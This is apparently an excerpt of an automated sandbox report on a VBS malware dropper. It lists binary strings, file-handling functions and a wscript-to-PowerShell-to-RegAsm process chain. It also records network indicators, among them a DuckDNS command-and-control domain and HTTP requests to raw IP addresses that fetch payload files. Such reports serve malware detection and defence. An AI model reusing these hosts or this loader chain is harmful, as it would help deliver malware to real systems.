                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\dnlib-fuscator-master win7\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00409253
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,4_2_0041C291
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,4_2_0040C34D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00409665
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0044E879 FindFirstFileExA,4_2_0044E879
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,4_2_0040880C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040783C FindFirstFileW,FindNextFileW,4_2_0040783C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,4_2_00419AF5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0040BB30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0040BD37
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,4_2_00407C97

                  Software Vulnerabilities

                  barindex
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                  Networking

                  barindex
                  Source: Malware configuration extractorURLs: 2024remcmon.duckdns.org
                  Source: unknownDNS query: name: 2024remcmon.duckdns.org
                  Source: createactiveimagesbeautygirlfrnd.gIF.vbsBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
                  Source: createactiveimagesbeautygirlfrnd.gIF.vbsBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
                  Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xampp/glo/KBV.txt HTTP/1.1Host: 192.3.176.154Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 192.210.214.9 192.210.214.9
                  Source: Joe Sandbox ViewIP Address: 198.46.176.133 198.46.176.133
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
